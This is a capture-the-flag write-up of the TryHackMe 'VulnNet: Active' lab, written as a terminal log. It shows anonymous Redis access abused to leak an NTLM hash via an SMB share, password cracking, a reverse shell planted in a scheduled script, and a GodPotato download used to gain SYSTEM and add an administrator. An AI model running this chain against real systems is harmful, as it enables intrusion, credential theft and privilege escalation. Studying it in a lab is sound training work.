wp-tryhackme-vulnnetactive

Posted on In Views: Disqus: Word count in article: 1.5k Reading time ≈ 6 mins.
rustscan,redis,smb,potato

vulnnetactive

vulnnetactive

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

➜  ~ rustscan -a 10.10.241.222
...
Open 10.10.241.222:53
Open 10.10.241.222:135
Open 10.10.241.222:139
Open 10.10.241.222:445
Open 10.10.241.222:464
Open 10.10.241.222:6379
Open 10.10.241.222:9389
# some rdp port
...
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
...

# can change options add -Pn and try again
# but this is easier
➜  ~ nmap -p 53,135,139,445,464,6379,9389,49668,49669,49670,49665,49695,49684,49725 y -sV -Pn
# i use openvpn the speed of nmap is too slow there
...
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        .NET Message Framing

try rpcclient

1
2
3
4
5
➜  ~ rpcclient -U "" -N 10.10.241.222
Can't load /etc/samba/smb.conf - run testparm to debug it
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

try the 445 port smb

1
2
3
4
5
6
7
➜  ~ smbclient --list=10.10.241.222 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

redis anon login success

1
2
3
4
5
6
7
➜  ~ redis-cli -h 10.10.241.222 -p 6379
10.10.241.222:6379>
# anon login
10.10.181.236:6379> info
...
redis_version:2.8.2402
...

i use a Buffer Overflow exploit here and box down restart i'm weak. search wp this is a writedown

1
2
3
4
5
6
7
8
9
➜  tmp mkdir share
➜  tmp sudo smbserver.py share ./share/ -smb2support

# to another terminal
➜  ~ redis-cli -h 10.10.85.177 -p 6379
10.10.85.177:6379>
10.10.85.177:6379> eval "dofile('//10.2.30.143/share')" 0
(error) ERR Error running script (call to f_543eb4e9bfd7a56b2435c29889e09eded2d76127): @user_script:1: cannot open //10.2.30.143/share: Invalid argument
(8.88s)

the terminal run smbserver.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
[*] Incoming connection (10.10.85.177,49723)
[*] AUTHENTICATE_MESSAGE (VULNNET\enterprise-security,VULNNET-BC3TCK1)
[*] User VULNNET-BC3TCK1\enterprise-security authenticated successfully
[*] # a hash need to crack, write it to a file name hash
[*] SMB_COM_TREE_CONNECT_ANDX (NT_STATUS_OK)
[*] SMB_COM_TREE_CONNECT_ANDX (NT_STATUS_OK)
[*] Closing down connection (10.10.85.177,49723)

# use john to crack
➜  tmp john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
# get a password

10.10.85.177:6379> config get *
# there username enterprise-security
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

# list shares
➜  tmp smbclient --list=10.10.85.177 --user="enterprise-security"
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\enterprise-security]:# password

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Enterprise-Share Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available


# connect with username and password
➜  tmp smbclient //10.10.85.177/Enterprise-Share --user enterprise-security%sand_0873959498
Can't load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
# get the file
PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 08:33:18 2021

smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

# check the file
➜  tmp cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
# must be a scheduled task


put the file and connect to the reverse shell

generate a reverse shell from this website reverse shell 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  tmp vim PurgeIrrelevantData_1826.ps1

smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (0.8 kb/s) (average 0.8 kb/s)

➜  tmp nc -lvnp 5555
Connection from 10.10.85.177:49981
dir
nssm-2.24-101-g897c7ad Redis-x64-2.8.2402 startup.bat

# idk why the port connect failed
# restart box and put file again XD

➜  ~ nc -lvnp 5555 -s 10.2.30.143
Connection from 10.10.65.131:49878
# seem to wait for a minute to connect
PS C:\Users\enterprise-security\Downloads>

PS C:\Users\enterprise-security\Downloads>cd ../Desktop

PS C:\Users\enterprise-security\Desktop> cat user.txt
flag1 here

check server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\Users\enterprise-security\Desktop> net user enterprise-security
User name                    enterprise-security
Full Name                    Enterprise Security
Comment                      TryHackMe
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2021 3:01:37 PM
Password expires             Never
Password changeable          2/24/2021 3:01:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/15/2025 1:26:19 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

check systeminfo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
PS C:\Users\enterprise-security\Desktop> systeminfo

Host Name:                 VULNNET-BC3TCK1
OS Name:                   Microsoft Windows Server 2019 Datacenter Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00431-20000-00000-AA463
Original Install Date:     2/22/2021, 11:43:53 AM
System Boot Time:          2/15/2025, 1:24:20 AM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     512 MB
Available Physical Memory: 22 MB
Virtual Memory: Max Size:  1,536 MB
Virtual Memory: Available: 563 MB
Virtual Memory: In Use:    973 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    vulnnet.local
Logon Server:              N/A
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB4601558
                           [02]: KB4512577
                           [03]: KB4535680
                           [04]: KB4577586
                           [05]: KB4580325
                           [06]: KB4601393
                           [07]: KB4601345
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.65.131
                                 [02]: fe80::1dd:1ec1:4c5:d082
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

PS C:\Users\enterprise-security\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

# upload the potato
➜  GodPotato ll
Permissions Size User Date Modified Name
.rw-r--r--   57k arch 11 Apr  2023   GodPotato-NET2.exe
.rw-r--r--   57k arch 11 Apr  2023   GodPotato-NET4.exe
.rw-r--r--   57k arch 11 Apr  2023   GodPotato-NET35.exe
➜  GodPotato python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.65.131 - - [15/Feb/2025 17:50:22] "GET /GodPotato-NET2.exe HTTP/1.1" 200 -

PS C:\Users\enterprise-security\Desktop> wget http://10.2.30.143:8000/GodPotato-NET4.exe -O ./godp4.exe

PS C:\Users\enterprise-security\Desktop> ./godp4.exe -cmd "cmd /c dir C:\Users\Administrator"
[*] CombaseModule: 0x140733969006592
[*] DispatchTable: 0x140733971324080
[*] UseProtseqFunction: 0x140733970702976
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4da21aff-ffb5-4a47-af7f-019eab286383\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006402-0c10-ffff-ee0e-33ef74b5baf8
[*] DCOM obj OXID: 0xdd26d2fc8207ef
[*] DCOM obj OID: 0x77d89bccc1acede2
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x652  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3840
 Volume in drive C has no label.
 Volume Serial Number is AAC5-C2C2

 Directory of C:\Users\Administrator

02/15/2025  01:57 AM    <DIR>          .
02/15/2025  01:57 AM    <DIR>          ..
02/22/2021  01:55 PM    <DIR>          3D Objects
02/22/2021  01:55 PM    <DIR>          Contacts
02/23/2021  08:27 PM    <DIR>          Desktop
02/22/2021  01:55 PM    <DIR>          Documents
02/22/2021  01:55 PM    <DIR>          Downloads
02/22/2021  01:55 PM    <DIR>          Favorites
02/22/2021  01:55 PM    <DIR>          Links
02/22/2021  01:55 PM    <DIR>          Music
02/22/2021  01:55 PM    <DIR>          Pictures
02/22/2021  01:55 PM    <DIR>          Saved Games
02/22/2021  01:55 PM    <DIR>          Searches
02/22/2021  01:55 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  21,037,834,240 bytes free


PS C:\Users\enterprise-security\Desktop> ./godp4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"
[*] CombaseModule: 0x140733969006592
[*] DispatchTable: 0x140733971324080
[*] UseProtseqFunction: 0x140733970702976
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\99631637-198e-472d-9d6a-63e633c32bfb\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000cc02-0fd4-ffff-01d4-b1acf4583182
[*] DCOM obj OXID: 0xa6a0591471e2029c
[*] DCOM obj OID: 0x57e054a57b20a35a
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x652  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1952
flag2 here

also can add the user to the administrator group

1
2
3
4
5
6
7
8
9
PS C:\Users\enterprise-security\Desktop>  ./godp4.exe -cmd "net localgroup administrators enterprise-security /add"

PS C:\Users\enterprise-security\Desktop> net user enterprise-security
...
Local Group Memberships      *Administrators
Global Group memberships     *Domain Users

# impacket script
➜  tmp psexec.py enterprise-security@10.10.65.131